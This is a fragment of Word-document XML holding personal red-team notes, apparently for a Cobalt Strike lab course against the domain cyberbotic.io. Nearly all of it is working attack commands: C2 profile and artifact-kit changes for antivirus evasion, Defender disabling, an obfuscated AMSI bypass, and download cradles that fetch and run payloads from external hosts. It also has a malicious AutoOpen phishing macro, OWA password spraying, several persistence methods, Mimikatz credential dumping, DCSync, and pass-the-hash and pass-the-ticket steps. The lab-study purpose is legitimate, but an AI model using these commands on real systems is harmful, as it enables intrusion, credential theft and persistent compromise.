        <w:t># customize client indicators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"Accept" "text/html,image/avif,image/webp,*/*";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"Accept-Language" "en-US,en;q=0.5";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"Accept-Encoding" "gzip, deflate";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"Referer" "https://www.google.com";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parameter "utm" "ISO-8898-1";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parameter "utc" "en-US";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metadata{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base64;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"Cookie";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server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 customize server indicators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"Content-Type" "image/gif";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"Server" "Microsoft IIS/10.0";</w:t>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"X-Powered-By" "ASP.NET";</w:t>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output{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prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";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prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";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prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";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print;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http-post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set uri "/submit.aspx /finish.aspx";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client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"Content-Type" "application/octet-stream";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"Accept" "text/html,image/avif,image/webp,*/*";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"Accept-Language" "en-US,en;q=0.5";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"Accept-Encoding" "gzip, deflate";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"Referer" "https://www.google.com";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parameter "id";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output{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print;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ab/>
      </w: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server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 customize server indicators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"Content-Type" "text/plain";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"Server" "Microsoft IIS/10.0";</w:t>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"X-Powered-By" "ASP.NET";</w:t>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output{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netbios;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prepend "&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;";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append "&lt;/h1&gt;&lt;/body&gt;&lt;/html&gt;";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print;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http-stager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server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"Content-Type" "application/octet-stream";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"Server" "Microsoft IIS/10.0";</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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header "X-Powered-By" "ASP.NET";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Setup CS Listeners</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Setting up the SMB Listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Default pipe name is quite well signatured.  A good strategy is to emulate names known to be used by common applications or Windows itself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PS C:\&gt; ls \\.\pipe\</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> to list all currently listening pipes for inspiration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TSVCPIPE-4036c92b-65ae-4601-1337-57f7b24a0c57</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Setting up Pivot Listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Beacon_reverse_tcp and Beacon_Bind_Tcp both are different type of Listeners.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Pivot Listeners can only be created from a beacon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Steps to create a Pivot Listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB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Click on the Beacon Host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB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Select Pivoting &gt; Listener and Give it a Name and leave other options untouched (Modify if required)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB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Now in the Beacon Host machine you can check that is Beacon Process has a opened Port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>netstat -anop tcp | findstr &lt;PORT&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where port is the pivot listener port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB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Now go to the payloads and generate any payload and select the beacon_reverse_tcp as payload listener.</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Defender Antivirus / AMSI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Modifying Artifact Kit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Modify script_template.cna and replace all instances of rundll32.exe with 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&gt; $template_path="C:\Tools\cobaltstrike\arsenal-kit\kits\artifact\script_template.cna" ; (Get-Content -Path $template_path)  -replace 'rundll32.exe' ,  'dllhost.exe' | Set-Content -Path $template_path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Compile the Artifact kit (From WSL in Attacker windows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cd /mnt/c/Tools/cobaltstrike/arsenal-kit/kits/artifact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./build.sh pipe VirtualAlloc 296948 5 false false none /mnt/c/Tools/cobaltstrike/artifacts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Other Techniques are : mailslot, peek , pipe, readfile, readfile-v2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load the artifact kit in cobalt strike (Cobalt Strike &gt; Script Manager &gt; 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generate the payloads and test if these are getting detected, if they are detected by ThreatCheck , Follow the notes to modify the artifact kit code.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Resource kit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Compile the resource kit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cd /mnt/c/Tools/cobaltstrike/arsenal-kit/kits/resource &amp;&amp; ./build.sh /mnt/c/Tools/cobaltstrike/resources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Elevate kit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Load Elevate kit in cobalt strike (manually or from script console)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aggressor&gt; load C:\Tools\cobaltstrike\elevate-kit\elevate.cna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test AMSI, use the AMSI Test Sample PowerShell cmdlet.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 term 'AMSI' is not recognised" refers that AMSI is not enabled, So either AMSI Bypass is working or Defender is not enabled.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Invoke-Expression 'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386'</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test on-disk detections, drop the EICAR test file somewhere such as the desktop.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X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*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if the payload is AV Safe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C:\Tools\ThreatCheck\ThreatCheck\ThreatCheck\bin\Release\ThreatCheck.exe -f C:\Payloads\smb_x64.svc.exe -e AMSI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C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\http_x64.exe -e AMSI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One Liner to test all payloads for AV safe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Get-ChildItem -Path "C:\Payloads\" -File | ForEach-Object { &amp; echo "Testing file against ThreatCheck (AMSI): $_" ; C:\Tools\ThreatCheck\ThreatCheck\ThreatCheck\bin\Release\ThreatCheck.exe -e AMSI -f $_.FullName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Load the CNA file: Cobalt Strike &gt; Script Manager &gt; Load &gt; and select the CNA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Payloads &gt; Windows Stageless Generate All Payloads to replace all of your payloads in `C:\Payloads`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Disable AMSI in Malleable C2 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vim c2-profiles/normal/webbug.profile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Right above the `http-get` block, add the following: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post-ex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amsi_disable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set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";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r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>#set spawnto_x64 "%windir%\\System32\\dllhost.exe";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spawnto_x86 "%windir%\\syswow64\\dllhost.exe";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Minimize the Behavioural Detections by modifying the Malleable c2 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stage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userwx "false"; #Allocate Beacon DLL as RW/RX rather than RWX.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cleanup "true"; #Free memory associated with reflective loader after it has been loaded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obfuscate "true"; # Load Beacon into memory without its DLL headers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module_x64 "xpsservices.dll"; #Load DLL from disk, then replace its memory with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the modified C2 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attacker@ubuntu ~/cobaltstrike&gt; ./c2lint c2-profiles/normal/webbug.profile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Creating custom C2 profiles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https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/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`amsi_disable` only applies to `powerpick`, `execute-assembly` and `psinject`.  It **does not** apply to the powershell command.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Behaviour Detections (change default process for fork &amp; run)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spawnto x64 %windir%\System32\taskhostw.exe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spawnto x86 %windir%\syswow64\dllhost.exe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spawnto x64 %windir%\System32\dllhost.exe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spawnto x86 %windir%\syswow64\dllhost.exe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Get-Process -Id $pid | select ProcessName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Change the default process for psexec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ak-settings spawnto_x64 C:\Windows\System32\dllhost.exe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ak-settings spawnto_x86 C:\Windows\SysWOW64\dllhost.exe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Disable Defender from local powershell session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Get-MPPreference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Set-MPPreference -DisableRealTimeMonitoring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Set-MPPreference -DisableIOAVProtection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Set-MPPreference -DisableIntrusionPreventionSystem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AMSI BYPASS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AMSI BYPASS :  Use AMSI Bypass with powershell payload if required,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Save below one liner to a ps1 file and host it on cobalt strike and use Powershell IEX to fetch and run it in memory to bypass AMSI.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Malleable C2 amsi_disable does not applies to Cobalt Strike Jump Command, So some methods in jump command which uses Powershell like psexec_psh , winrm </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>and winrm64 will not work if payload is detected, So we musty have to use Custom AMSI Bypass script to avoid that and get a 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make the jump command work and include amsi bypass into it, We need to modify the Resource kit's template.x86.ps1 (for winrm), template.x64.ps1 (for winrm64) and compress.ps1 (for psexec_psh).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learn more , Read this blog - https://offensivedefence.co.uk/posts/making-amsi-jump/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S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} ) ; Start-Job -ScriptBlock{iex (iwr http://nickelviper.com/a -UseBasicParsing)}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Like below</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powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/amsi-bypass.ps1')) ; IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"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It can also be combined with Macro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Powershell Execute cradles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iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')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powershell.exe -nop -w hidden -c "iex (iwr http://nickelviper.com/amsi-bypass.ps1 -UseBasicParsing)"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$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1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');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response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PSv3 onwards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iex (iwr 'http://192.168.230.1/evil.ps1')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$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex $h.responseText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$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")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$r = $wr.GetResponse()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IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()</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Initial Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Enumerating OWA to identify valid user and conducting password spraying attack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Identify the mail server of given domain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dig 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./dnscan.py -d cyberbotic.io -w subdomains-100.txt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Idenitfy the NETBIOS name of target domain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ipmo C:\Tools\MailSniper\MailSniper.ps1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Invoke-DomainHarvestOWA -ExchHostname mail.cyberbotic.io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Extract Employee Names (FirstName LastName) and Prepare Username List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~/namemash.py names.txt &gt; possible.txt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Validate the username to find active/real usernames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Invoke-UsernameHarvestOWA -ExchHostname mail.cyberbotic.io -Domain cyberbotic.io -UserList .\Desktop\possible.txt -OutFile .\Desktop\valid.txt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Conduct Password Spraying attack with known Password on identified users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Invoke-PasswordSprayOWA -ExchHostname mail.cyberbotic.io -UserList .\Desktop\valid.txt -Password Summer2022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Identified credentials to download Global Address List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Get-GlobalAddressList -ExchHostname mail.cyberbotic.io -UserName cyberbotic.io\iyates -Password Summer2022 -OutFile .\Desktop\gal.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Create a malicious Office file having embedded macro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Step 1: Open a blank word document "Document1". Navigate to  View &gt; Macros &gt; Create. Changes macros in to Document1. Name the default macro function as AutoOpen. Paste the below content and run for testing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Sub AutoOpen()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Dim Shell As Object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Shell = CreateObject("wscript.shell")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Shell.Run "notepad"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End Sub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Step 2: Generate a payload for web delivery (Attacks &gt; Scripted Web Delivery (S) and generate a 64-bit PowerShell payload with your HTTP/DNS listener). Balance the number of quotes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Sub AutoOpen()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Dim Shell As Object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 Shell = CreateObject("wscript.shell")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b/>
        <w:t>Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""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End Sub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Step 3: Save the document as .doc file and send it as phising email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AMSI BYPASS :  Use AMSI Bypass with above payload if required,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Save below one liner to a ps1 file and host it on cobalt strike and use Powershell IEX to fetch and run it in memory to bypass AMSI.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S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE}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Like below, It can also be combined with above Macro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Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/amsi-bypass.ps1')) ; IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""</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Host Reconnaissance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Identify running process like AV, EDR or any monitoring and logging solution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Check default process for fork &amp; run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Get-Process -Id $pid | select ProcessName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Seatbealt to enumerate about system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-group=system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Screenshot, Clipboard, Keylogger and User Sessions of currently logged in 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screenshot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clipboard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net logons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keylogger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job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jobkill 3</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Host Persistence (Normal + Privileged)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Default location for powershell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C:\windows\syswow64\windowspowershell\v1.0\powershell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C:\Windows\System32\WindowsPowerShell\v1.0\powershell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Encode the payload for handling extra quotes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Powershell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$str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'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[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))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#Linux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echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 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Final Command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 -nop -enc &lt;BASE64_ENCODED_PAYLOAD&gt;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Common userland persistence methods include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HKCU / HKLM Registry Autoruns,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Scheduled Tasks,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Startup Folder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CobaltStrike AggressorScripts for Persistence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Copy the aggressor script cna code and paste in the Attacker machine and also copy the sharpersist.exe from Attacker machine Tools and put in the same directory as of persistence cna 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https://github.com/Peco602/cobaltstrike-aggressor-scripts/tree/main/persistence-sharpersist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Tip : Windows Service Peristence with a onDisk Executable is most reliable in lab (Need Priv to configure)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Persistance - Task Scheduler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Persistance hourly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C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoAC...GEAIgApACkA" -n "Updater" -m add -o hourly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Persistance on Logon (Need Admin Privileges)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C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoAC...GEAIgApACkA" -n "Updater" -m add -o logon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Persistance - Startup Folder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$str = "IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/amsi-bypass.ps1')) ; IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"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[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))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execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAbQBzAGkALQBiAHkAcABhAHMAcwAuAHAAcwAxACcAKQApACAAOwAgAEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbgBpAGMAawBlAGwAdgBpAHAAZQByAC4AYwBvAG0ALwBhACcAKQApAA==" -f "UserEnvSetup" -m add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Persistance - Registry Autorun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C:\ProgramData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upload C:\Payloads\http_x64.exe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mv http_x64.exe Updater.exe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C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add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Persistance COM Hijacks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Persistance - Privilleged System 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Windows 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C:\Windows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C:\Payloads\tcp-local_x64.svc.exe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mv tcp-local_x64.svc.exe legit-svc.exe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C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add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Register WMI event to trigger our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C:\Windows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C:\Payloads\dns_x64.exe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C:\Tools\PowerLurk.ps1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Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe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TIP : Use a beacon with slow check-in and spawn a new Session from it , So that it can be later used as lifeline.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 x64 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inject 4464 x64 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a new Session (child of current process) using spawn or shspawn.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 x64 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shspawn x64 C:\Payloads\msf_http_x64.bin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a full Beacon payload for the specified listener using inject or shinject.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inject 4464 x64 tcp-local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 C:\Windows\System32\notepad.exe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shinject &lt;PID&gt; x64 msf.bin</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Host Privilege Escalation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Query and Manage all the installed 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Get-Service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wmic service get name, pathname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query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qc VulnService2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stop VulnService1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start VulnService1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SharpUp to find exploitable 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execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit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 1: Unquoted Service Path (Hijack the service binary search logic to execute our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C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit UnquotedServicePath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Get-Acl -Path "C:\Program Files\Vulnerable Services"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C:\Program Files\Vulnerable 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C:\Payloads\tcp-local_x64.svc.exe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mv tcp-local_x64.svc.exe Service.exe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stop VulnService1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start VulnService1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connect localhost 4444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 2: Weak Service Permission (Possible to modify service configuration)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C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServices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C:\Tools\Get-ServiceAcl.ps1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Get-ServiceAcl -Name VulnService2 | select -expand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qc VulnService2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mkdir C:\Temp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C:\Temp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C:\Payloads\tcp-local_x64.svc.exe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config VulnService2 binPath= C:\Temp\tcp-local_x64.svc.exe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qc VulnService2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stop VulnService2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start VulnService2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connect localhost 4444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 3: Weak Service Binary Permission (Overwite the service binary due to weak permission)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C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServices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Get-Acl -Path "C:\Program Files\Vulnerable Services\Service 3.exe"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C:\Payloads&gt; copy "tcp-local_x64.svc.exe" "Service 3.exe"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stop VulnService3</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"C:\Program Files\Vulnerable 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C:\Payloads\Service3.exe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sc start VulnService3</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connect localhost 4444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UAC Bypass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whoami /groups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elevate uac-schtasks tcp-local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netstat -anop tcp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connect localhost 4444</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Credential Theft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 symbol is used to run command in elevated context of System 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 symbol is used to impersonate beacon thread token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Dump TGT/TGS Tickets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!sekurlsa::tickets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triage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dump /luid:0x14794e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monitor /interval:10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Dump the local SAM database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!lsadump::sam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Dump the logon passwords (Plain Text + Hashes) from LSASS.exe for currently logged on users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!sekurlsa::logonpasswords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Dump the encryption keys used by Kerberos of logged on users (hashes incorrectly labelled as des_cbc_md4)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!sekurlsa::ekeys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Dump Domain Cached Credentials (cannotbe be used for lateral movement unless cracked as the hash format is not NTLM so it can't be used with pass the hash)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https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials#cracking-mscash-mscache-with-hashcat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!lsadump::cache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List the kerberos tickets cached in current logon session or all logon session (privileged session)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triage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Dump the TGT Ticket from given Logon Session (LUID)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dump /luid:0x7049f /service:krbtgt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DC Sync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make_token DEV\nlamb F3rrari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dcsync dev.cyberbotic.io DEV\krbtgt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!lsadump::dcsync /all /domain:dev.cyberbotic.io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Dump krbtgt hash from DC (locally)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!lsadump::lsa /inject /name:krbtgt</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Domain Recon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Domain Recon using Power View</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Load Powerview powershell script in Beacon Session (Cobalt Strike)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Information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 -Domain &lt;&gt;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SID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Controller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Get-DomainController | select Forest, Name, OSVersion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Forest Information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Get-ForestDomain -Forest &lt;&gt;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Get Domain Policy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Get-DomainPolicyData | select -expand SystemAccess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users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-Identity jking -Properties DisplayName, MemberOf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Identify Kerberoastable/ASEPRoastable User/Uncontrained Delegation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 select cn,serviceprincipalname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-PreauthNotRequired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-TrustedToAuth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Computer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-Properties DnsHostName | sort -Property DnsHostName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Idenitify Computer Accounts where unconstrained and constrained delegation is enabled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-Unconstrained | select cn, dnshostname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-TrustedToAuth | select cn, msdsallowedtodelegateto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OU</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Get-DomainOU -Properties Name | sort -Property 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Identify computers in given OU</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-SearchBase "OU=Workstations,DC=dev,DC=cyberbotic,DC=io" | select dnsHostName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group (Use -Recurse Flag)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 | where Name -like "*Admins*" | select SamAccountName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Group Member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"Domain Admins" | select MemberDistinguishedName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"Domain Admins" -Recurse | select MemberDistinguishedName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GPO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Get-DomainGPO -Properties DisplayName | sort -Property DisplayName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the System where given GPO are applicable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Get-DomainOU -GPLink "{AD2F58B9-97A0-4DBC-A535-B4ED36D5DD2F}" | select distinguishedName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Idenitfy domain users/group who have local admin via Restricted group or GPO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Get-DomainGPOLocalGroup | select GPODisplayName, GroupName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Enumerates the machines where a specific domain user/group has local admin rights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Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName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Domain Trusts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Get-DomainTrust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interesting ACLs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Find-InterestingDomainAcl -ResolveGUIDs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Local Admin Access on other domain computers based on context of current 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Find-LocalAdminAccess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Invoke-CheckLocalAdminAccess -ComputerName &lt;server_fqdn&gt;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 available in Powerview , need scripts Find-WMILocalAdminAccess.ps1 and Find-PSRemotingLocalAdminAccess.ps1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Find-PSRemotingLocalAdminAccess -ComputerName &lt;server_fqdn&gt;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Find-WMILocalAdminAccess -ComputerName &lt;server_fqdn&gt;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Check for computers where users or domain admin may have logged in sessions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computers where a domain admin (or specified user/group) has sessions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Find-DomainUserLocation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Find-DomainUserLocation -UserGroupIdentity "Domain Users"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computers where a domain admin session is available and current user has admin access (uses `Test-AdminAccess`). -CheckAccess Flag Sometimes not gives accurate results with Find-DomainUserLocation , So use Invoke-UserHunter.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Invoke-UserHunter -CheckAccess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Find-DomainUserLocation -CheckAccess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computers (File Servers and Distributed File servers) where a domain admin session is available.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Find-DomainUserLocation –Stealth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Invoke-StealthUserHunter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Finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines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Invoke-UserHunter -CheckAccess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Finds all file servers utilizes in user HomeDirectories, and checks the sessions one each file server, hunting for particular users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Invoke-StealthUserHunter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Hunts for processes with a specific name or owned by specific user on domain machines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Invoke-ProcessHunter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Hunts for user logon events in domain controller event logs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Invoke-UserEventHunter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shares on hosts in current domain.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Invoke-ShareFinder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sensitive files on computers in the domain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Invoke-FileFinder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all fileservers of the domain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Get-NetFileServer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Domain recon using SharpView binary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C:\Tools\SharpView\SharpView\bin\Release\SharpView.exe Get-Domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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lastRenderedPageBreak/>
        <w:t>Domain recon using ADSearch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"objectCategory=user"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"(&amp;(objectCategory=group)(cn=*Admins*))"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"(&amp;(objectCategory=group)(cn=MS SQL Admins))" --attributes cn,member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Kerberostable Users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"(&amp;(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName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ASEPROAST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"(&amp;(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname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Unconstrained Delegation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"(&amp;(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname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Constrained Delegation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"(&amp;(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json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Additionally, the `--json` parameter can be used to format the output in JSON</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User Impersonation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Pass The Hash Attack (PTH)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getuid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\\web.dev.cyberbotic.io\c$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PTH using inbuild method in CS (internally uses Mimikatz)</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pth DEV\jking 59fc0f884922b4ce376051134c71e22c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Local Admin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Find-LocalAdminAccess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rev2self</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3E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Pass The Ticket Attack (PTT)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a sacrificial token with dummy credentials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C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123</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the TGT ticket into logon session returned as output of previous command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ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP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OR Combine above 2 steps in one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execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123 /ticket:doIFuj[...snip...]lDLklP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4748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token-store steal 4748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check access by trying to list the c: drive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\\web.dev.cyberbotic.io\c$</w:t>
      </w:r>
    </w:p>
